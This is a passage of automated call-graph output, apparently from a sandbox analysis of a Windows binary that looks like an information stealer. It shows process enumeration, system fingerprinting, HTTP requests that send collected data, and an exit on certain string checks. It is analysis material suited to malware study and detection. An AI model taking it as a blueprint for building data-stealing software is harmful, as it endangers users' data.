4047e8 3 API calls 91531->91532 91533 403223 91532->91533 91534 4047e8 3 API calls 91533->91534 91535 40323a 91534->91535 91536 4047e8 3 API calls 91535->91536 91537 403250 91536->91537 91538 4047e8 3 API calls 91537->91538 91539 403267 91538->91539 91540 4047e8 3 API calls 91539->91540 91541 40327e 91540->91541 91542 4047e8 3 API calls 91541->91542 91543 403295 91542->91543 91544 4047e8 3 API calls 91543->91544 91545 4032ab 91544->91545 91546 4047e8 3 API calls 91545->91546 91547 4032c2 91546->91547 91548 4047e8 3 API calls 91547->91548 91549 4032d9 91548->91549 91550 4047e8 3 API calls 91549->91550 91551 4032f0 91550->91551 91552 4047e8 3 API calls 91551->91552 91553 403306 91552->91553 91554 4047e8 3 API calls 91553->91554 91555 40331c 91554->91555 91556 4047e8 3 API calls 91555->91556 91557 403333 91556->91557 91558 4047e8 3 API calls 91557->91558 91559 403349 91558->91559 91560 4047e8 3 API calls 91559->91560 91561 40335d 91560->91561 91562 4047e8 3 API calls 91561->91562 91563 403374 91562->91563 91564 4047e8 3 API calls 91563->91564 91565 40338a 91564->91565 91566 4047e8 3 API calls 91565->91566 91567 4033a1 91566->91567 91568 4047e8 3 API calls 91567->91568 91569 4033b8 91568->91569 91570 4047e8 3 API calls 91569->91570 91571 4033cf 91570->91571 91572 4047e8 3 API calls 91571->91572 91573 4033e6 91572->91573 91574 4047e8 3 API calls 91573->91574 91575 4033fd 91574->91575 91576 4047e8 3 API calls 91575->91576 91577 403414 91576->91577 91578 4047e8 3 API calls 91577->91578 91579 40342e 91578->91579 91580 4047e8 3 API calls 91579->91580 91581 403445 91580->91581 91582 4047e8 3 API calls 91581->91582 91583 40345c 91582->91583 91584 4047e8 3 API calls 91583->91584 91585 403473 91584->91585 91586 4047e8 3 API calls 91585->91586 91587 40348a 91586->91587 91588 4047e8 3 API calls 91587->91588 91589 4034a1 91588->91589 91590 4047e8 3 API calls 91589->91590 91591 4034b8 91590->91591 91592 4047e8 3 API calls 91591->91592 91593 4034cf 91592->91593 91594 4047e8 3 API calls 91593->91594 91595 4034e9 91594->91595 91596 4047e8 3 API calls 91595->91596 91597 403500 91596->91597 91598 4047e8 3 API calls 91597->91598 91599 403517 91598->91599 91600 4047e8 3 API calls 91599->91600 91601 40352e 91600->91601 91602 4047e8 3 API calls 91601->91602 91603 403545 91602->91603 91604 4047e8 3 API calls 91603->91604 91605 40355c 91604->91605 91606 4047e8 3 API calls 91605->91606 91607 403573 91606->91607 91608 4047e8 3 API calls 91607->91608 91609 40358a 91608->91609 91610 4047e8 3 API calls 91609->91610 91611 4035a4 91610->91611 91612 4047e8 3 API calls 91611->91612 91613 4035bb 91612->91613 91614 4047e8 3 API calls 91613->91614 91615 4035d2 91614->91615 91616 4047e8 3 API calls 91615->91616 91617 4035e9 91616->91617 91618 4047e8 3 API calls 91617->91618 91619 403600 91618->91619 91620 4047e8 3 API calls 91619->91620 91621 403617 91620->91621 91622 4047e8 3 API calls 91621->91622 91623 40362d 91622->91623 91624 4047e8 3 API calls 91623->91624 91625 403643 91624->91625 91626 4047e8 3 API calls 91625->91626 91627 40365d 91626->91627 91628 4047e8 3 API calls 91627->91628 91629 403674 91628->91629 91630 4047e8 3 API calls 91629->91630 91631 40368b 91630->91631 91632 4047e8 3 API calls 91631->91632 91633 4036a1 91632->91633 91634 4047e8 3 API calls 91633->91634 91635 4036b8 91634->91635 91636 4047e8 3 API calls 91635->91636 91637 4036cf 91636->91637 91638 4047e8 3 API calls 91637->91638 91639 4036e3 91638->91639 91640 4047e8 3 API calls 91639->91640 91641 4036f9 91640->91641 91642 4047e8 3 API calls 91641->91642 91643 403713 91642->91643 91644 4047e8 3 API calls 91643->91644 91645 40372a 91644->91645 91646 4047e8 3 API calls 91645->91646 91647 403741 91646->91647 91648 4047e8 3 API calls 91647->91648 91649 403758 91648->91649 91650 4047e8 3 API calls 91649->91650 91651 40376f 91650->91651 91652 4047e8 3 API calls 91651->91652 91653 403786 91652->91653 91654 4047e8 3 API calls 91653->91654 91655 40379a 91654->91655 91656 4047e8 3 API calls 91655->91656 91657 4037b1 91656->91657 91658 4047e8 3 API calls 91657->91658 91659 4037cb 91658->91659 91660 4047e8 3 API calls 91659->91660 91661 4037e2 91660->91661 91662 4047e8 3 API calls 91661->91662 91663 4037f6 91662->91663 91664 4047e8 3 API calls 91663->91664 91665 40380a 91664->91665 91666 4047e8 3 API calls 91665->91666 91667 403821 91666->91667 91668 4047e8 3 API calls 91667->91668 91669 403838 91668->91669 91670 4047e8 3 API calls 91669->91670 91671 40384f 91670->91671 91672 4047e8 3 API calls 91671->91672 91673 403866 91672->91673 91674 4047e8 3 API calls 91673->91674 91675 403880 91674->91675 91676 4047e8 3 API calls 91675->91676 91677 403897 91676->91677 91678 4047e8 3 API calls 91677->91678 91679 4038ae 91678->91679 91680 4047e8 3 API calls 91679->91680 91681 4038c5 91680->91681 91682 4047e8 3 API calls 91681->91682 91683 4038db 91682->91683 91684 4047e8 3 API calls 91683->91684 91685 4038f2 91684->91685 91686 4047e8 3 API calls 91685->91686 91687 403906 91686->91687 91688 4047e8 3 API calls 91687->91688 91689 40391d 91688->91689 91690 4047e8 3 API calls 91689->91690 91691 403937 91690->91691 91692 4047e8 3 API calls 91691->91692 91693 40394e 91692->91693 91694 4047e8 3 API calls 91693->91694 91695 403965 91694->91695 91696 4047e8 3 API calls 91695->91696 91697 40397c 91696->91697 91698 4047e8 3 API calls 91697->91698 91699 403993 91698->91699 91700 4047e8 3 API calls 91699->91700 91701 4039aa 91700->91701 91702 4047e8 3 API calls 91701->91702 91703 4039c1 91702->91703 91704 4047e8 3 API calls 91703->91704 91705 4039d8 91704->91705 91706 4047e8 3 API calls 91705->91706 91707 4039f2 91706->91707 91708 4047e8 3 API calls 91707->91708 91709 403a09 91708->91709 91710 4047e8 3 API calls 91709->91710 91711 403a20 91710->91711 91712 4047e8 3 API calls 91711->91712 91713 403a37 91712->91713 91714 4047e8 3 API calls 91713->91714 91715 403a4e 91714->91715 91716 4047e8 3 API calls 91715->91716 91717 403a65 91716->91717 91718 4047e8 3 API calls 91717->91718 91719 403a7c 91718->91719 91720 4047e8 3 API calls 91719->91720 91721 403a90 91720->91721 91722 4047e8 3 API calls 91721->91722 91723 403aaa 91722->91723 91724 4047e8 3 API calls 91723->91724 91725 403ac1 91724->91725 91726 4047e8 3 API calls 91725->91726 91727 403ad7 91726->91727 91728 4047e8 3 API calls 91727->91728 91729 403aee 91728->91729 91730 4047e8 3 API calls 91729->91730 91731 403b05 91730->91731 91732 4047e8 3 API calls 91731->91732 91733 403b1c 91732->91733 91734 4047e8 3 API calls 91733->91734 91735 403b33 91734->91735 91736 4047e8 3 API calls 91735->91736 91737 403b4a 91736->91737 91738 4047e8 3 API calls 91737->91738 91739 403b61 91738->91739 91740 4047e8 3 API calls 91739->91740 91741 403b75 91740->91741 91742 4047e8 3 API calls 91741->91742 91743 403b8c 91742->91743 91744 4047e8 3 API calls 91743->91744 91745 403ba3 91744->91745 91746 4047e8 3 API calls 91745->91746 91747 403bba 91746->91747 91748 4047e8 3 API calls 91747->91748 91749 403bd1 91748->91749 91750 4047e8 3 API calls 91749->91750 91751 403be8 91750->91751 91752 4047e8 3 API calls 91751->91752 91753 403bff 91752->91753 91754 4047e8 3 API calls 91753->91754 91755 403c19 91754->91755 91756 4047e8 3 API calls 91755->91756 91757 403c30 91756->91757 91758 4047e8 3 API calls 91757->91758 91759 403c47 91758->91759 91760 4047e8 3 API calls 91759->91760 91761 403c5e 91760->91761 91762 4047e8 3 API calls 91761->91762 91763 403c75 91762->91763 91764 4047e8 3 API calls 91763->91764 91765 403c8c 91764->91765 91766 4047e8 3 API calls 91765->91766 91767 403ca3 91766->91767 91768 4047e8 3 API calls 91767->91768 91769 403cb7 91768->91769 91770 4047e8 3 API calls 91769->91770 91771 403cd1 91770->91771 91772 4047e8 3 API calls 91771->91772 91773 403ce8 91772->91773 91774 4047e8 3 API calls 91773->91774 91775 403cff 91774->91775 91776 4047e8 3 API calls 91775->91776 91777 403d16 91776->91777 91778 4047e8 3 API calls 91777->91778 91779 403d2c 91778->91779 91780 4047e8 3 API calls 91779->91780 91781 403d43 91780->91781 91782 4047e8 3 API calls 91781->91782 91783 403d57 91782->91783 91784 4047e8 3 API calls 91783->91784 91785 403d6e 91784->91785 91786 4047e8 3 API calls 91785->91786 91787 403d85 91786->91787 91788 4047e8 3 API calls 91787->91788 91789 403d9c 91788->91789 91790 4047e8 3 API calls 91789->91790 91791 403db3 91790->91791 91792 4047e8 3 API calls 91791->91792 91793 403dca 91792->91793 91794 4047e8 3 API calls 91793->91794 91795 403de1 91794->91795 91796 4047e8 3 API calls 91795->91796 91797 403df8 91796->91797 91798 4047e8 3 API calls 91797->91798 91799 403e0f 91798->91799 91800 4047e8 3 API calls 91799->91800 91801 403e26 91800->91801 91802 4047e8 3 API calls 91801->91802 91803 403e40 91802->91803 91804 4047e8 3 API calls 91803->91804 91805 403e57 91804->91805 91806 4047e8 3 API calls 91805->91806 91807 403e6e 91806->91807 91808 4047e8 3 API calls 91807->91808 91809 403e84 91808->91809 91810 4047e8 3 API calls 91809->91810 91811 403e9b 91810->91811 91812 4047e8 3 API calls 91811->91812 91813 403eb2 91812->91813 91814 4047e8 3 API calls 91813->91814 91815 403ec9 91814->91815 91816 4047e8 3 API calls 91815->91816 91817 403ee0 91816->91817 91818 4047e8 3 API calls 91817->91818 91819 403efa 91818->91819 91820 4047e8 3 API calls 91819->91820 91821 403f10 91820->91821 91822 4047e8 3 API calls 91821->91822 91823 403f27 91822->91823 91824 4047e8 3 API calls 91823->91824 91825 403f3e 91824->91825 91826 4047e8 3 API calls 91825->91826 91827 403f55 91826->91827 91828 4047e8 3 API calls 91827->91828 91829 403f6c 91828->91829 91830 4047e8 3 API calls 91829->91830 91831 403f80 91830->91831 91832 4047e8 3 API calls 91831->91832 91833 403f97 91832->91833 91834 4047e8 3 API calls 91833->91834 91835 403fb1 91834->91835 91836 4047e8 3 API calls 91835->91836 91837 403fc7 91836->91837 91838 4047e8 3 API calls 91837->91838 91839 403fde 91838->91839 91840 4047e8 3 API calls 91839->91840 91841 403ff2 91840->91841 91842 4047e8 3 API calls 91841->91842 91843 404009 91842->91843 91844 4047e8 3 API calls 91843->91844 91845 404020 91844->91845 91846 4047e8 3 API calls 91845->91846 91847 404037 91846->91847 91848 4047e8 3 API calls 91847->91848 91849 40404e 91848->91849 91850 4047e8 3 API calls 91849->91850 91851 404067 91850->91851 91852 4047e8 3 API calls 91851->91852 91853 40407e 91852->91853 91854 4047e8 3 API calls 91853->91854 91855 404094 91854->91855 91856 4047e8 3 API calls 91855->91856 91857 4040a8 91856->91857 91858 4047e8 3 API calls 91857->91858 91859 4040bf 91858->91859 91860 4047e8 3 API calls 91859->91860 91861 4040d6 91860->91861 91862 4047e8 3 API calls 91861->91862 91863 4040ed 91862->91863 91864 4047e8 3 API calls 91863->91864 91865 404104 91864->91865 91866 4047e8 3 API calls 91865->91866 91867 40411e 91866->91867 91868 4047e8 3 API calls 91867->91868 91869 404135 91868->91869 91870 4047e8 3 API calls 91869->91870 91871 40414c 91870->91871 91872 4047e8 3 API calls 91871->91872 91873 404163 91872->91873 91874 4047e8 3 API calls 91873->91874 91875 404179 91874->91875 91876 4047e8 3 API calls 91875->91876 91877 40418d 91876->91877 91878 4047e8 3 API calls 91877->91878 91879 4041a1 91878->91879 91880 4047e8 3 API calls 91879->91880 91881 4041b8 91880->91881 91882 4047e8 3 API calls 91881->91882 91883 4041d2 91882->91883 91884 4047e8 3 API calls 91883->91884 91885 4041e8 91884->91885 91886 4047e8 3 API calls 91885->91886 91887 4041ff 91886->91887 91888 4047e8 3 API calls 91887->91888 91889 404216 91888->91889 91890 4047e8 3 API calls 91889->91890 91891 40422d 91890->91891 91892 4047e8 3 API calls 91891->91892 91893 404244 91892->91893 91894 4047e8 3 API calls 91893->91894 91895 404258 91894->91895 91896 4047e8 3 API calls 91895->91896 91897 40426e 91896->91897 91898 4047e8 3 API calls 91897->91898 91899 404288 91898->91899 91900 4047e8 3 API calls 91899->91900 91901 40429f 91900->91901 91902 4047e8 3 API calls 91901->91902 91903 4042b6 91902->91903 91904 4047e8 3 API calls 91903->91904 91905 4042cc 91904->91905 91906 4047e8 3 API calls 91905->91906 91907 4042e3 91906->91907 91908 4047e8 3 API calls 91907->91908 91909 4042fa 91908->91909 91910 4047e8 3 API calls 91909->91910 91911 404311 91910->91911 91912 4047e8 3 API calls 91911->91912 91913 404325 91912->91913 91914 4047e8 3 API calls 91913->91914 91915 40433c 91914->91915 91916 4047e8 3 API calls 91915->91916 91917 404353 91916->91917 91918 4047e8 3 API calls 91917->91918 91919 40436a 91918->91919 91920 4047e8 3 API calls 91919->91920 91921 404381 91920->91921 91922 4047e8 3 API calls 91921->91922 91923 404395 91922->91923 91924 4047e8 3 API calls 91923->91924 91925 4043ac 91924->91925 91926 4047e8 3 API calls 91925->91926 91927 4043c3 91926->91927 91928 4047e8 3 API calls 91927->91928 91929 4043da 91928->91929 91930 4047e8 3 API calls 91929->91930 91931 4043f1 91930->91931 91932 4047e8 3 API calls 91931->91932 91933 404408 91932->91933 91934 4047e8 3 API calls 91933->91934 91935 40441c 91934->91935 91936 4047e8 3 API calls 91935->91936 91937 404433 91936->91937 91938 4047e8 3 API calls 91937->91938 91939 40444a 91938->91939 91940 4047e8 3 API calls 91939->91940 91941 40445e 91940->91941 91942 4047e8 3 API calls 91941->91942 91943 404472 91942->91943 91944 4047e8 3 API calls 91943->91944 91945 404486 91944->91945 91946 4047e8 3 API calls 91945->91946 91947 4044a0 91946->91947 91948 4047e8 3 API calls 91947->91948 91949 4044b7 91948->91949 91950 4047e8 3 API calls 91949->91950 91951 4044cd 91950->91951 91952 4047e8 3 API calls 91951->91952 91953 4044e4 91952->91953 91954 4047e8 3 API calls 91953->91954 91955 4044fa 91954->91955 91956 4047e8 3 API calls 91955->91956 91957 404511 91956->91957 91958 4047e8 3 API calls 91957->91958 91959 404528 91958->91959 91960 4047e8 3 API calls 91959->91960 91961 40453e 91960->91961 91962 4047e8 3 API calls 91961->91962 91963 404558 91962->91963 91964 4047e8 3 API calls 91963->91964 91965 40456f 91964->91965 91966 4047e8 3 API calls 91965->91966 91967 404586 91966->91967 91968 4047e8 3 API calls 91967->91968 91969 40459d 91968->91969 91970 4047e8 3 API calls 91969->91970 91971 4045b4 91970->91971 91972 4047e8 3 API calls 91971->91972 91973 4045cb 91972->91973 91974 4047e8 3 API calls 91973->91974 91975 4045e2 91974->91975 91976 4047e8 3 API calls 91975->91976 91977 4045f9 91976->91977 91978 4047e8 3 API calls 91977->91978 91979 404612 91978->91979 91980 4047e8 3 API calls 91979->91980 91981 404629 91980->91981 91982 4047e8 3 API calls 91981->91982 91983 404642 91982->91983 91984 4047e8 3 API calls 91983->91984 91985 404656 91984->91985 91986 4047e8 3 API calls 91985->91986 91987 40466d 91986->91987 91988 4047e8 3 API calls 91987->91988 91989 404684 91988->91989 91990 4047e8 3 API calls 91989->91990 91991 40469b 91990->91991 91992 4047e8 3 API calls 91991->91992 91993 4046b2 91992->91993 91994 4047e8 3 API calls 91993->91994 91995 4046cc 91994->91995 91996 4047e8 3 API calls 91995->91996 91997 4046e3 91996->91997 91998 4047e8 3 API calls 91997->91998 91999 4046f9 91998->91999 92000 4047e8 3 API calls 91999->92000 92001 404710 92000->92001 92002 4047e8 3 API calls 92001->92002 92003 404727 92002->92003 92004 4047e8 3 API calls 92003->92004 92005 40473d 92004->92005 92006 4047e8 3 API calls 92005->92006 92007 404754 92006->92007 92008 4047e8 3 API calls 92007->92008 92009 404768 92008->92009 92010 4047e8 3 API calls 92009->92010 92011 404781 92010->92011 92012 4047e8 3 API calls 92011->92012 92013 404797 92012->92013 92014 4047e8 3 API calls 92013->92014 92015 4047ae 92014->92015 92016 4047e8 3 API calls 92015->92016 92017 4047c5 92016->92017 92018 4047e8 3 API calls 92017->92018 92019 4047dc 92018->92019 92019->91036 93338 42f109 92020->93338 92022 41258e CreateToolhelp32Snapshot Process32First 92023 4125c2 Process32Next 92022->92023 92024 4125ef CloseHandle 92022->92024 92023->92024 92026 4125d4 StrCmpCA 92023->92026 93339 42f165 92024->93339 92026->92023 92028 4125e6 92026->92028 92028->92023 92030 4104e7 lstrcpyA 92029->92030 92031 411c67 92030->92031 92032 4104e7 lstrcpyA 92031->92032 92033 411c75 GetSystemTime 92032->92033 92034 411c91 92033->92034 92035 41d016 setSBUpLow 5 API calls 92034->92035 92036 411cc8 92035->92036 92036->91042 92039 4105e1 92037->92039 92038 410605 92038->91058 92039->92038 92040 4105f3 lstrcpyA lstrcatA 92039->92040 92040->92038 92042 410519 lstrcpyA 92041->92042 92043 401d07 92042->92043 92044 410519 lstrcpyA 92043->92044 92045 401d12 92044->92045 92046 410519 lstrcpyA 92045->92046 92047 401d1d 92046->92047 92048 410519 lstrcpyA 92047->92048 92049 401d34 92048->92049 92050 4169b6 92049->92050 92051 410549 2 API calls 92050->92051 92052 4169ec 92051->92052 92053 410549 2 API calls 92052->92053 92054 4169f9 92053->92054 92055 410549 2 API calls 92054->92055 92056 416a06 92055->92056 92057 4104e7 lstrcpyA 92056->92057 92058 416a13 92057->92058 92059 4104e7 lstrcpyA 92058->92059 92060 416a20 92059->92060 92061 4104e7 lstrcpyA 92060->92061 92062 416a2d 92061->92062 92063 4104e7 lstrcpyA 92062->92063 92064 416a3a 92063->92064 92065 4104e7 lstrcpyA 92064->92065 92066 416a47 92065->92066 92067 4104e7 lstrcpyA 92066->92067 92123 416a54 92067->92123 92070 401cfd lstrcpyA 92070->92123 92071 416a98 StrCmpCA 92072 416af1 StrCmpCA 92071->92072 92071->92123 92073 416cd4 92072->92073 92072->92123 92076 41058d lstrcpyA 92073->92076 92077 416cdf 92076->92077 92079 4104e7 lstrcpyA 92077->92079 92080 416cec 92079->92080 92081 41058d lstrcpyA 92080->92081 92116 416c2c 92081->92116 92082 41683e 28 API calls 92082->92123 92083 4168c6 33 API calls 92083->92123 92084 41058d lstrcpyA 92084->92123 92085 4104e7 lstrcpyA 92086 416d0b 92085->92086 92088 41058d lstrcpyA 92086->92088 92087 416b51 StrCmpCA 92089 416baa StrCmpCA 92087->92089 92087->92123 92090 416d15 92088->92090 92092 416bc0 StrCmpCA 92089->92092 92093 416ca3 92089->92093 93351 416da2 92090->93351 92095 416c72 92092->92095 92096 416bd6 StrCmpCA 92092->92096 92094 41058d lstrcpyA 92093->92094 92102 416cae 92094->92102 92100 41058d lstrcpyA 92095->92100 92097 416be8 StrCmpCA 92096->92097 92098 416c3e 92096->92098 92104 416c0a 92097->92104 92105 416bfa Sleep 92097->92105 92107 41058d lstrcpyA 92098->92107 92099 410519 lstrcpyA 92099->92123 92106 416c7d 92100->92106 92103 4104e7 lstrcpyA 92102->92103 92108 416cbb 92103->92108 92109 41058d lstrcpyA 92104->92109 92105->92123 92110 4104e7 lstrcpyA 92106->92110 92111 416c49 92107->92111 92112 41058d lstrcpyA 92108->92112 92113 416c15 92109->92113 92114 416c8a 92110->92114 92115 4104e7 lstrcpyA 92111->92115 92112->92116 92117 4104e7 lstrcpyA 92113->92117 92118 41058d lstrcpyA 92114->92118 92119 416c56 92115->92119 92116->92085 92121 416c22 92117->92121 92118->92116 92120 41058d lstrcpyA 92119->92120 92120->92116 92122 41058d lstrcpyA 92121->92122 92122->92116 92123->92070 92123->92071 92123->92072 92123->92082 92123->92083 92123->92084 92123->92087 92123->92089 92123->92099 93342 4029f8 92123->93342 93345 402a09 92123->93345 93348 402a1a 92123->93348 93358 402a2b lstrcpyA 92123->93358 93359 402a3c lstrcpyA 92123->93359 93360 402a4d lstrcpyA 92123->93360 92124 416d28 92124->91070 92126 41058d lstrcpyA 92125->92126 92127 418257 92126->92127 92128 41058d lstrcpyA 92127->92128 92129 418262 92128->92129 92130 41058d lstrcpyA 92129->92130 92131 41826d 92130->92131 92131->91074 92133 410529 92132->92133 92134 41053e 92133->92134 92135 410536 lstrcpyA 92133->92135 92134->91085 92135->92134 92137 4109e6 GetVolumeInformationA 92136->92137 92138 4109df 92136->92138 92139 410a4d 92137->92139 92138->92137 92139->92139 92140 410a62 GetProcessHeap HeapAlloc 92139->92140 92141 410a7d 92140->92141 92142 410a8c wsprintfA lstrcatA 92140->92142 92143 4104e7 lstrcpyA 92141->92143 93361 411684 GetCurrentHwProfileA 92142->93361 92145 410a85 92143->92145 92148 41d016 setSBUpLow 5 API calls 92145->92148 92146 410ac7 lstrlenA 93377 4123d5 lstrcpyA malloc strncpy 92146->93377 92150 410b2e 92148->92150 92149 410aea lstrcatA 92151 410b01 92149->92151 92150->91112 92152 4104e7 lstrcpyA 92151->92152 92153 410b18 92152->92153 92153->92145 92155 410519 lstrcpyA 92154->92155 92156 404b59 92155->92156 93381 404ab6 92156->93381 92158 404b65 92159 4104e7 lstrcpyA 92158->92159 92160 404b81 92159->92160 92161 4104e7 lstrcpyA 92160->92161 92162 404b91 92161->92162 92163 4104e7 lstrcpyA 92162->92163 92164 404ba1 92163->92164 92165 4104e7 lstrcpyA 92164->92165 92166 404bb1 92165->92166 92167 4104e7 lstrcpyA 92166->92167 92168 404bc1 InternetOpenA StrCmpCA 92167->92168 92169 404bf5 92168->92169 92170 405194 InternetCloseHandle 92169->92170 92171 411c4a 7 API calls 92169->92171 92181 4051e1 92170->92181 92172 404c15 92171->92172 92173 4105c7 2 API calls 92172->92173 92174 404c28 92173->92174 92175 41058d lstrcpyA 92174->92175 92176 404c33 92175->92176 92177 410609 3 API calls 92176->92177 92178 404c5f 92177->92178 92179 41058d lstrcpyA 92178->92179 92180 404c6a 92179->92180 92182 410609 3 API calls 92180->92182 92183 41d016 setSBUpLow 5 API calls 92181->92183 92184 404c8b 92182->92184 92185 405235 92183->92185 92186 41058d lstrcpyA 92184->92186 92287 4139c2 StrCmpCA 92185->92287 92187 404c96 92186->92187 92188 4105c7 2 API calls 92187->92188 92189 404cb8 92188->92189 92190 41058d lstrcpyA 92189->92190 92191 404cc3 92190->92191 92192 410609 3 API calls 92191->92192 92193 404ce4 92192->92193 92194 41058d lstrcpyA 92193->92194 92195 404cef 92194->92195 92196 410609 3 API calls 92195->92196 92197 404d10 92196->92197 92198 41058d lstrcpyA 92197->92198 92199 404d1b 92198->92199 92200 410609 3 API calls 92199->92200 92201 404d3d 92200->92201 92202 4105c7 2 API calls 92201->92202 92203 404d48 92202->92203 92204 41058d lstrcpyA 92203->92204 92205 404d53 92204->92205 92206 404d69 InternetConnectA 92205->92206 92206->92170 92207 404d97 HttpOpenRequestA 92206->92207 92208 404dd7 92207->92208 92209 405188 InternetCloseHandle 92207->92209 92210 404dfb 92208->92210 92211 404ddf InternetSetOptionA 92208->92211 92209->92170 92212 410609 3 API calls 92210->92212 92211->92210 92213 404e11 92212->92213 92214 41058d lstrcpyA 92213->92214 92215 404e1c 92214->92215 92216 4105c7 2 API calls 92215->92216 92217 404e3e 92216->92217 92218 41058d lstrcpyA 92217->92218 92219 404e49 92218->92219 92220 410609 3 API calls 92219->92220 92221 404e6a 92220->92221 92222 41058d lstrcpyA 92221->92222 92223 404e75 92222->92223 92224 410609 3 API calls 92223->92224 92225 404e97 92224->92225 92226 41058d lstrcpyA 92225->92226 92227 404ea2 92226->92227 92228 410609 3 API calls 92227->92228 92229 404ec3 92228->92229 92230 41058d lstrcpyA 92229->92230 92231 404ece 92230->92231 92232 410609 3 API calls 92231->92232 92233 404eef 92232->92233 92234 41058d lstrcpyA 92233->92234 92235 404efa 92234->92235 92236 4105c7 2 API calls 92235->92236 92237 404f19 92236->92237 92238 41058d lstrcpyA 92237->92238 92239 404f24 92238->92239 92240 410609 3 API calls 92239->92240 92241 404f45 92240->92241 92242 41058d lstrcpyA 92241->92242 92243 404f50 92242->92243 92244 410609 3 API calls 92243->92244 92245 404f71 92244->92245 92246 41058d lstrcpyA 92245->92246 92247 404f7c 92246->92247 92248 4105c7 2 API calls 92247->92248 92249 404f9e 92248->92249 92250 41058d lstrcpyA 92249->92250 92251 404fa9 92250->92251 92252 410609 3 API calls 92251->92252 92253 404fca 92252->92253 92254 41058d lstrcpyA 92253->92254 92255 404fd5 92254->92255 92256 410609 3 API calls 92255->92256 92257 404ff7 92256->92257 92258 41058d lstrcpyA 92257->92258 92259 405002 92258->92259 92260 410609 3 API calls 92259->92260 92261 405023 92260->92261 92262 41058d lstrcpyA 92261->92262 92263 40502e 92262->92263 92264 410609 3 API calls 92263->92264 92265 40504f 92264->92265 92266 41058d lstrcpyA 92265->92266 92267 40505a 92266->92267 92268 4105c7 2 API calls 92267->92268 92269 405079 92268->92269 92270 41058d lstrcpyA 92269->92270 92271 405084 92270->92271 92272 4104e7 lstrcpyA 92271->92272 92273 40509f 92272->92273 92274 4105c7 2 API calls 92273->92274 92275 4050b6 92274->92275 92276 4105c7 2 API calls 92275->92276 92277 4050c7 92276->92277 92278 41058d lstrcpyA 92277->92278 92279 4050d2 92278->92279 92280 4050e8 lstrlenA lstrlenA HttpSendRequestA 92279->92280 92281 40515c InternetReadFile 92280->92281 92282 405176 InternetCloseHandle 92281->92282 92285 40511c 92281->92285 92283 402920 92282->92283 92283->92209 92284 410609 3 API calls 92284->92285 92285->92281 92285->92282 92285->92284 92286 41058d lstrcpyA 92285->92286 92286->92285 92288 4139e1 ExitProcess 92287->92288 92289 4139e8 strtok_s 92287->92289 92290 413b48 92289->92290 92303 413a04 92289->92303 92290->91121 92291 413b2a strtok_s 92291->92290 92291->92303 92292 413a21 StrCmpCA 92292->92291 92292->92303 92293 413a75 StrCmpCA 92293->92291 92293->92303 92294 413ab4 StrCmpCA 92294->92291 92294->92303 92295 413af4 StrCmpCA 92295->92291 92296 413b16 StrCmpCA 92296->92291 92297 413a59 StrCmpCA 92297->92291 92297->92303 92298 413ac9 StrCmpCA 92298->92291 92298->92303 92299 413a3d StrCmpCA 92299->92291 92299->92303 92300 413a9f StrCmpCA 92300->92291 92300->92303 92301 413ade StrCmpCA 92301->92291 92302 410549 2 API calls 92302->92303 92303->92291 92303->92292 92303->92293 92303->92294 92303->92295 92303->92296 92303->92297 92303->92298 92303->92299 92303->92300 92303->92301 92303->92302 92305 410519 lstrcpyA 92304->92305 92306 405f64 92305->92306 92307 404ab6 5 API calls 92306->92307 92308 405f70 92307->92308 92309 4104e7 lstrcpyA 92308->92309 92310 405f8c 92309->92310 92311 4104e7 lstrcpyA 92310->92311 92312 405f9c 92311->92312 92313 4104e7 lstrcpyA 92312->92313 92314 405fac 92313->92314 92315 4104e7 lstrcpyA 92314->92315 92316 405fbc 92315->92316 92317 4104e7 lstrcpyA 92316->92317 92318 405fcc InternetOpenA StrCmpCA 92317->92318 92319 406000 92318->92319 92320 4066ff InternetCloseHandle 92319->92320 92321 411c4a 7 API calls 92319->92321 93387 408048 CryptStringToBinaryA 92320->93387 92324 406020 92321->92324 92325 4105c7 2 API calls 92324->92325 92327 406033 92325->92327 92326 410549 2 API calls 92329 406739 92326->92329 92328 41058d lstrcpyA 92327->92328 92333 40603e 92328->92333 92330 410609 3 API calls 92329->92330 92331 406750 92330->92331 92332 41058d lstrcpyA 92331->92332 92338 40675b 92332->92338 92334 410609 3 API calls 92333->92334 92335 40606a 92334->92335 92336 41058d lstrcpyA 92335->92336 92337 406075 92336->92337 92341 410609 3 API calls 92337->92341 92339 41d016 setSBUpLow 5 API calls 92338->92339 92340 4067eb 92339->92340 92471 41343f strtok_s 92340->92471 92342 406096 92341->92342 92343 41058d lstrcpyA 92342->92343 92344 4060a1 92343->92344 92345 4105c7 2 API calls 92344->92345 92346 4060c3 92345->92346 92347 41058d lstrcpyA 92346->92347 92348 4060ce 92347->92348 92349 410609 3 API calls 92348->92349 92350 4060ef 92349->92350 92351 41058d lstrcpyA 92350->92351 92352 4060fa 92351->92352 92353 410609 3 API calls 92352->92353 92354 40611b 92353->92354 92355 41058d lstrcpyA 92354->92355 92356 406126 92355->92356 92357 410609 3 API calls 92356->92357 92358 406148 92357->92358 92359 4105c7 2 API calls 92358->92359 92360 406153 92359->92360 92361 41058d lstrcpyA 92360->92361 92362 40615e 92361->92362 92363 406174 InternetConnectA 92362->92363 92363->92320 92364 4061a2 HttpOpenRequestA 92363->92364 92365 4061e2 92364->92365 92366 4066f3 InternetCloseHandle 92364->92366 92367 406206 92365->92367 92368 4061ea InternetSetOptionA 92365->92368 92366->92320 92369 410609 3 API calls 92367->92369 92368->92367 92370 40621c 92369->92370 92371 41058d lstrcpyA 92370->92371 92372 406227 92371->92372 92373 4105c7 2 API calls 92372->92373 92374 406249 92373->92374 92375 41058d lstrcpyA 92374->92375 92376 406254 92375->92376 92377 410609 3 API calls 92376->92377 92378 406275 92377->92378 92379 41058d lstrcpyA 92378->92379 92380 406280 92379->92380 92381 410609 3 API calls 92380->92381 92382 4062a2 92381->92382 92383 41058d lstrcpyA 92382->92383 92384 4062ad 92383->92384 92385 410609 3 API calls 92384->92385 92386 4062cf 92385->92386 92387 41058d lstrcpyA 92386->92387 92388 4062da 92387->92388 92389 410609 3 API calls 92388->92389 92390 4062fb 92389->92390 92391 41058d lstrcpyA 92390->92391 92392 406306 92391->92392 92393 4105c7 2 API calls 92392->92393 92394 406325 92393->92394 92395 41058d lstrcpyA 92394->92395 92396 406330 92395->92396 92397 410609 3 API calls 92396->92397 92398 406351 92397->92398 92399 41058d lstrcpyA 92398->92399 92400 40635c 92399->92400 92401 410609 3 API calls 92400->92401 92402 40637d 92401->92402 92403 41058d lstrcpyA 92402->92403 92404 406388 92403->92404 92405 4105c7 2 API calls 92404->92405 92406 4063aa 92405->92406 92407 41058d lstrcpyA 92406->92407 92408 4063b5 92407->92408 92409 410609 3 API calls 92408->92409 92410 